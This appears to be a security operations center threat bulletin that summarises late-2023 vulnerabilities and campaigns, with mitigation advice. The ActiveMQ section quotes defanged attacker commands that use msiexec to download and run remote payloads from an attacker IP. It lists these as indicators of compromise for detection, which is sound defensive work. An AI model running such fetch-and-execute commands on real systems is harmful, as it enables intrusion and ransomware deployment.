In our Threat Bulletins, our highly skilled Security Operations Center (SOC) team has meticulously analyzed and summarized the top threats that have been monitored over the past several weeks. Stay one step ahead of the adversaries as we delve into the ever-evolving landscape of cyber threats, uncover their tactics, and equip you with the knowledge to fortify your defenses against them.
Sources:
- https://thehackernews.com/2023/10/urgent-new-security-flaws-discovered-in.html
- https://www.armosec.io/blog/cve-2023-5043-nginx-ingress/
- https://github.com/kubernetes/ingress-nginx/issues/10571
- https://github.com/kubernetes/ingress-nginx/issues/10572
- https://github.com/kubernetes/ingress-nginx/issues/10570
Entities:
- NGINX
- Kubernetes
- ARMO (Kubernetes security platform)
Indicators of Compromise:
- CVE-2022-4886
- CVE-2023-5043
- CVE-2023-5044
Attack Vectors:
- Attackers can exploit vulnerabilities in the NGINX Ingress controller for Kubernetes to steal secret credentials from the cluster. These vulnerabilities allow for path sanitization bypass, arbitrary command execution, and code injection.
Impact:
- Successful exploitation of these flaws could result in unauthorized access to sensitive data and the injection of arbitrary code into the ingress controller process.
Detailed Description:
- The security flaws in the NGINX Ingress controller for Kubernetes can allow attackers to bypass path sanitization, inject arbitrary commands, and execute code.
- CVE-2022-4886 specifically results from a lack of validation in a field within the Ingress object, enabling attackers to access Kubernetes API credentials.
- CVE-2023-5043 and CVE-2023-5044 vulnerabilities enable an attacker who can control the configuration of the Ingress object to steal secret credentials from the cluster. In default configuration, these secrets include credentials for the Kubernetes API server with very high privileges.
- The attacker can either use annotation field “configuration-snippet” (2023-5043) or “permanent-redirect” (2023-5044) to inject arbitrary code into the ingress controller process and get access to everything this process has access to. Among them the service account token of the ingress controller, which has a ClusterRole which enables reading on all Kubernetes secrets of the cluster.
Recommendations:
- To mitigate the risks associated with these vulnerabilities, it is recommended to apply the provided mitigations and updates. This includes enabling “strict-validate-path-type” and setting the “–enable-annotation-validation” flag.
- Additionally, updating NGINX to version 1.19 and adding the “–enable-annotation-validation” command-line configuration can resolve CVE-2023-5043 and CVE-2023-5044.
Sources:
- https://www.bleepingcomputer.com/news/security/exploit-released-for-critical-cisco-ios-xe-flaw-many-hosts-still-hacked/
- https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/
Entities:
- Cisco IOS XE
Indicators of Compromise:
- CVE-2023-20198
Attack Vectors:
- Remote code execution through Web Services Management Agent (WSMA)
Impact:
- Thousands of Cisco IOS XE devices compromised, unauthorized access, reconnaissance
Detailed Description:
- CVE-2023-20198 is a critical flaw that allows an attacker to create a full-privilege user on Cisco IOS XE devices.
- The exploit takes advantage of weaknesses in the Web Services Management Agent (WSMA) and Nginx-based server configurations.
- Cisco has released patches for the most affected versions, with version 17.3 remaining unpatched.
Recommendations:
- Apply the provided security patches for affected Cisco IOS XE versions.
Sources:
- https://www.bleepingcomputer.com/news/security/3-000-apache-activemq-servers-vulnerable-to-rce-attacks-exposed-online/
- https://www.rapid7.com/blog/post/2023/11/01/etr-suspected-exploitation-of-apache-activemq-cve-2023-46604/
Entities:
- Rapid7
- Apache ActiveM
- HelloKitty Ransomware
Attack Vectors:
- Remote code execution via Apache ActiveMQ vulnerability
Impact:
- Ransomware deployment
- Potential data loss
- System compromise
Detailed Description:
- Rapid7 detected two separate instances of Apache ActiveMQ CVE-2023-46604 exploitation.
- The adversary attempted to deploy ransomware binaries on target systems in an effort to ransom the victim organizations.
- CVE-2023-46604 is a remote code execution vulnerability in Apache ActiveMQ that allows a remote attacker with network access to a broker “to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath.”
- The ransomware encrypts files and communicates with an HTTP server, 172.245.16.125, through a provided email address, [email protected].
- During a successful exploitation of the vulnerability, Java.exe will contain the specific Apache application being targeted — in this case, D:\Program files\ActiveMQ\apache-activemq-5.15.3\bin\win64, which was observed as the parent process in both incidents.
- Post-exploitation, the adversary attempted to load remote binaries named M2.png and M4.png using MSIExec.
Indicators of Compromise:
- http://172[.]245[.]16[.]125/m2.png
- http://172[.]245[.]16[.]125/m4.png
- Files dropped and executed via the msiexec command:
- cmd.exe /c “start msiexec /q /i hxxp://172[.]245[.]16[.]125/m4.png”
- cmd.exe /c “start msiexec /q /i hxxp://172[.]245[.]16[.]125/m4.png”
- The following files hashes were part of the two MSI packages downloaded from the domain 172[.]245[.]16[.]125:
- M2.msi: 8177455ab89cc96f0c26bc42907da1a4f0b21fdc96a0cc96650843fd616551f4
- M4.msi: 8c226e1f640b570a4a542078a7db59bb1f1a55cf143782d93514e3bd86dc07a0
- dllloader: C3C0CF25D682E981C7CE1CC0A00FA2B8B46CCE2FA49ABE38BB412DA21DA99CB7
- EncDll: 3E65437F910F1F4E93809B81C19942EF74AA250AE228CACA0B278FC523AD47C
Affected Products:
- According to Apache’s advisory, CVE-2023-46604 affects the following:
- Apache ActiveMQ 5.18.0 before 5.18.3
- Apache ActiveMQ 5.17.0 before 5.17.6
- Apache ActiveMQ 5.16.0 before 5.16.7
- Apache ActiveMQ before 5.15.16
- Apache ActiveMQ Legacy OpenWire Module 5.18.0 before 5.18.3
- Apache ActiveMQ Legacy OpenWire Module 5.17.0 before 5.17.6
- Apache ActiveMQ Legacy OpenWire Module 5.16.0 before 5.16.7
- Apache ActiveMQ Legacy OpenWire Module 5.8.0 before 5.15.16
Recommendations:
- Users are recommended to upgrade both brokers and clients to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3 which fixes this issue.
SOC Response:
- The SOC is building a detection around the known indicators of compromise at this time and will monitor for any updates around this exploit.
Sources:
Entities:
- Vulnerable Windows Driver Model (WDM)
- Windows Driver Frameworks (WDF) drivers
Attack Vectors:
- Vulnerable Windows drivers
Impact:
- Non-privileged threat actors could exploit these drivers to gain control of devices and execute arbitrary code on the underlying systems. This can lead to firmware alteration, privilege escalation, and potentially render systems unbootable. Furthermore, these vulnerabilities can be weaponized for BYOVD (Bring Your Own Vulnerable Driver) attacks.
Detailed Description:
- Researchers have identified 34 unique vulnerable Windows drivers in the Windows Driver Model and Windows Driver Frameworks.
- Exploiting these drivers could allow threat actors to gain control of devices, execute arbitrary code, and, in some cases, alter firmware or elevate operating system privileges.
- The names of some of the vulnerable drivers include AODDriver.sys, ComputerZ.sys, dellbios.sys, GEDevDrv.sys, GtcKmdfBs.sys, IoAccess.sys, kerneld.amd64, ngiodriver.sys, nvoclock.sys, PDFWKRNL.sys (CVE-2023-20598), RadHwMgr.sys, rtif.sys, rtport.sys, stdcdrv64.sys, and TdkLib64.sys (CVE-2023-35841).Additionally, some drivers can bypass security mechanisms like KASLR and can be used for BYOVD attacks, which have been employed by threat actors like the Lazarus Group.
Recommendations:
- Ensure that the systems are kept up to date with the latest driver updates and patches. Employ security measures to prevent unauthorized driver installations.
Sources:
Entities:
- Veeam ONE IT monitoring and analytics platform
Attack Vectors:
- Vulnerabilities in Veeam ONE IT monitoring and analytics platform
Impact:
- Critical vulnerabilities have been identified in Veeam ONE IT monitoring software, with potential risks ranging from remote code execution on SQL servers to obtaining sensitive account information and cross-site scripting attacks.
Detailed Description:
- Veeam ONE IT monitoring software has been found to have four critical vulnerabilities, including flaws that could lead to remote code execution on SQL servers, exposure of sensitive account information, and cross-site scripting attacks.
- The list of vulnerabilities is as follows:
- CVE-2023-38547 (CVSS score: 9.9) – An unspecified flaw that can be leveraged by an unauthenticated user to gain information about the SQL server connection Veeam ONE uses to access its configuration database, resulting in remote code execution on the SQL server.
- CVE-2023-38548 (CVSS score: 9.8) – A flaw in Veeam ONE that allows an unprivileged user with access to the Veeam ONE Web Client to obtain the NTLM hash of the account used by the Veeam ONE Reporting Service.
- CVE-2023-38549 (CVSS score: 4.5) – A cross-site scripting (XSS) vulnerability that allows a user with the Veeam ONE Power User role to obtain the access token of a user with the Veeam ONE Administrator role.
- CVE-2023-41723 (CVSS score: 4.3) – A vulnerability in Veeam ONE that permits a user with the Veeam ONE Read-Only User role to view the Dashboard Schedule.
- These vulnerabilities can have serious implications for organizations using Veeam ONE for their IT monitoring needs.
- To mitigate these risks, Veeam has released security updates for affected versions.
Recommendations:
- Users of affected Veeam ONE versions are strongly advised to apply the security updates provided by Veeam. Additionally, it is recommended to stop the Veeam ONE Monitoring and Reporting services, replace existing files with the files provided in the hotfix, and then restart the two services.
Sources:
- https://thehackernews.com/2023/11/cisa-alerts-high-severity-slp.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-29552
Entities:
- Service Location Protocol (SLP)
- CVE-2023-29552
Attack Vectors:
- Denial-of-Service (DoS) vulnerability in SLP protocol
Impact:
- A high-severity flaw in the Service Location Protocol (SLP) is actively exploited, posing a risk of significant denial-of-service (DoS) amplification attacks. Tracked as CVE-2023-29552, the vulnerability allows unauthenticated remote attackers to register services and conduct DoS attacks with a substantial amplification factor.
Detailed Description:
- CISA has issued an alert regarding the active exploitation of a high-severity flaw in the Service Location Protocol (SLP).
- Tracked as CVE-2023-29552, the vulnerability allows unauthenticated remote attackers to register services and launch denial-of-service (DoS) attacks with a considerable amplification factor.
- While specific details of the exploitation are unknown, the potential impact on targeted networks and servers is significant.
Recommendations:
- Disable the SLP service on systems running on untrusted networks.
Sources:
Entities:
- ScreenConnect
- Transaction Data Systems (TDS)
- Healthcare Organizations
Attack Vectors:
- Compromised ScreenConnect instances
Impact:
- Unauthorized access
- Installation of malicious payloads
- Network reconnaissance
Detailed Description:
- Huntress has identified a series of cyberattacks targeting healthcare organizations in the U.S., exploiting vulnerabilities in ScreenConnect instances used by TDS.
- The attackers employ similar tactics across multiple incidents, involving the installation of malicious payloads and additional remote access tools for persistent access.
- The compromised endpoints, operating on Windows Server 2019, are associated with the pharmaceutical and healthcare sectors.
- The ScreenConnect instance is linked to the ‘rs.tdsclinical[.]com’ domain.
- The exact breach mechanism, whether through compromised credentials or another method, remains unclear.
Recommendations:
- Immediately investigate and secure ScreenConnect instances associated with the ‘rs[.]tdsclinical[.]com’ domain.
Sources:
- https://thehackernews.com/2023/11/alert-effluence-backdoor-persists.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-22515
- https://nvd.nist.gov/vuln/detail/CVE-2023-22518
Entities:
- Atlassian Confluence Servers
- Effluence Backdoor
Attack Vectors:
- Exploitation of critical vulnerabilities (CVE-2023-22515 and CVE-2023-22518) in Atlassian Confluence Servers leading to the deployment of the Effluence backdoor. The vulnerabilities entail:
- CVE-2023-22515 – A critical bug in Atlassian that could be abused to create unauthorized Confluence administrator accounts and access Confluence servers.
- CVE-2023-22518 – An attacker can also take advantage of to set up a rogue administrator account, resulting in a complete loss of confidentiality, integrity, and availability
Impact:
- Deployment of Effluence, a persistent backdoor following the successful exploitation of critical vulnerabilities in Atlassian Confluence Servers.
- The backdoor allows remote access without authentication, enabling lateral movement within the network, data exfiltration, and various malicious actions on the compromised server.
Detailed Description:
- A persistent backdoor named Effluence is discovered following the exploitation of critical vulnerabilities (CVE-2023-22515 and CVE-2023-22518) in Atlassian Confluence Servers.
- Despite patching, Effluence remains active, allowing unauthorized remote access and various malicious activities.
- The attack involves embedding a web shell that provides access to every web page on the server.
- The adversary gains initial access through CVE-2023-22515, embedding a web shell that grants access to all web pages.
Recommendations:
- Organizations using Atlassian Confluence Servers should urgently apply patches for CVE-2023-22515 and CVE-2023-22518 to mitigate the risk of exploitation.
SOC Response:
- The SOC is building a detection around known indicators of compromise at this time and will continue to monitor for any updates around this exploit.
Sources:
- https://thehackernews.com/2023/11/alert-microsoft-releases-patch-updates.html
- https://www.bleepingcomputer.com/news/microsoft/microsoft-november-2023-patch-tuesday-fixes-5-zero-days-58-flaws/
- https://msrc.microsoft.com/update-guide/releaseNote/2023-Nov
Entities:
- Microsoft
- CVE-2023-36025
- CVE-2023-36033
- CVE-2023-36036
- CVE-2023-36038
- CVE-2023-36413
Attack Vectors:
- Exploitation of zero-day vulnerabilities
- Windows SmartScreen
- Elevation of Privilege
- Denial of Service
- Security Feature Bypass
- Information Disclosure
Impact:
- Elevation of privilege
- Bypassing security features
- Potential remote code execution
Detailed Description:
- Microsoft’s November updates cover 63 security flaws, including 5 zero-days actively exploited.
- The five zero-days that are of note are as follows –
- CVE-2023-36025 (CVSS score: 8.8) – Windows SmartScreen Security Feature Bypass Vulnerability
- CVE-2023-36033 (CVSS score: 7.8) – Windows DWM Core Library Elevation of Privilege Vulnerability
- CVE-2023-36036 (CVSS score: 7.8) – Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability
- CVE-2023-36038 (CVSS score: 8.2) – ASP.NET Core Denial of Service Vulnerability
- CVE-2023-36413 (CVSS score: 6.5) – Microsoft Office Security Feature Bypass Vulnerability
Recommendations:
- Apply Microsoft’s November updates promptly.
Sources:
- https://www.bleepingcomputer.com/news/security/cisa-warns-of-actively-exploited-juniper-pre-auth-rce-exploit-chain/#google_vignette
- https://supportportal.juniper.net/s/article/2023-08-Out-of-Cycle-Security-Bulletin-Junos-OS-SRX-Series-and-EX-Series-Multiple-vulnerabilities-in-J-Web-can-be-combined-to-allow-a-preAuth-Remote-Code-Execution?language=en_US
Entities:
- CISA
- Juniper
Attack Vectors:
- Remote Code Execution (RCE) via Juniper’s J-Web interface.
Impact:
- Significant risks to federal enterprises; Actively exploited vulnerabilities.
Detailed Description:
- The vulnerabilities (CVE-2023-36844, CVE-2023-36845, CVE-2023-36846, CVE-2023-36847) in Juniper’s J-Web interface are part of a pre-auth exploit chain, allowing remote code execution.
- Successful exploitation has been observed in the wild.
- Administrators are advised to upgrade JunOS immediately or restrict internet access to the J-Web interface.
- CISA emphasizes urgency, adding the vulnerabilities to its Known Exploited Vulnerabilities Catalog.
Recommendations:
- Organizations are strongly encouraged to prioritize patching.
Sources:
Entities:
- Routers
- NVRs
- Mirai-based Botnet
- Akamai
- JenX Mirai
- InfectedSlurs
- HailBot
- wso-ng
- AWS
- Redis database
- Microsoft
Attack Vectors:
- Two zero-day vulnerabilities with remote code execution (RCE) functionality targeting routers and network video recorder (NVR) devices. Exploitation of default admin credentials, installation of Mirai variants.
Impact:
- Massive, distributed denial-of-service (DDoS) attacks, potential compromise of sensitive data, lateral movement within affected organizations, and persistent threat presence.
Detailed Description:
- The malware campaign exploits two zero-day vulnerabilities, targeting routers and NVRs using default admin credentials to install Mirai variants.
- The botnet, InfectedSlurs, employs racial and offensive language in its command-and-control servers.
- Akamai discovered the campaign in late October 2023, with fixes for one vulnerability expected to be released next month.
- The attackers’ identity remains unknown.
Recommendations:
- Apply patches promptly upon release by vendors to mitigate the vulnerabilities.
- Change default admin credentials on routers and NVR devices.
- Implement network segmentation to limit lateral movement.
Sources:
- https://www.bleepingcomputer.com/news/security/cisa-warns-of-actively-exploited-windows-sophos-and-oracle-bugs/
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog
Entities:
- U.S. Cybersecurity & Infrastructure Security Agency (CISA)
- Microsoft Windows
- Sophos Web Appliance
- Oracle Fusion Middleware
Indicators of Compromise:
- CVE-2023-36584
- CVE-2023-1671
- CVE-2020-2551
Attack Vectors:
- Exploiting applications vulnerable to CVE-2023-36584, CVE-2023-1671 and CVE-2020-2551
Impact:
- Remote Code Execution
- Compromise of WebLogic Server
- Security Feature Bypass
Detailed Description:
- CISA has added three actively exploited vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, emphasizing the need for immediate attention and mitigation.
- The three vulnerabilities are:
- CVE-2023-36584 – “Mark of the Web” (MotW) security feature bypass on Microsoft Windows.
- CVE-2023-1671 – Command injection vulnerability in Sophos Web Appliance allowing remote code execution (RCE).
- CVE-2020-2551 – Unspecified vulnerability in Oracle Fusion Middleware, allowing an unauthenticated attacker with network access via IIOP to compromise the WebLogic server.
- Microsoft addressed CVE-2023-36584 in the October 2023 Patch Tuesday.
- Sophos Web Appliance, affected by CVE-2023-1671, reached end-of-life on July 20, and users are advised to migrate to Sophos Firewall for ongoing security.
Recommendations:
- Apply relevant security updates to address the identified vulnerabilities.:
- Sophos Web Appliance users must migrate to Sophos Firewall for ongoing security support.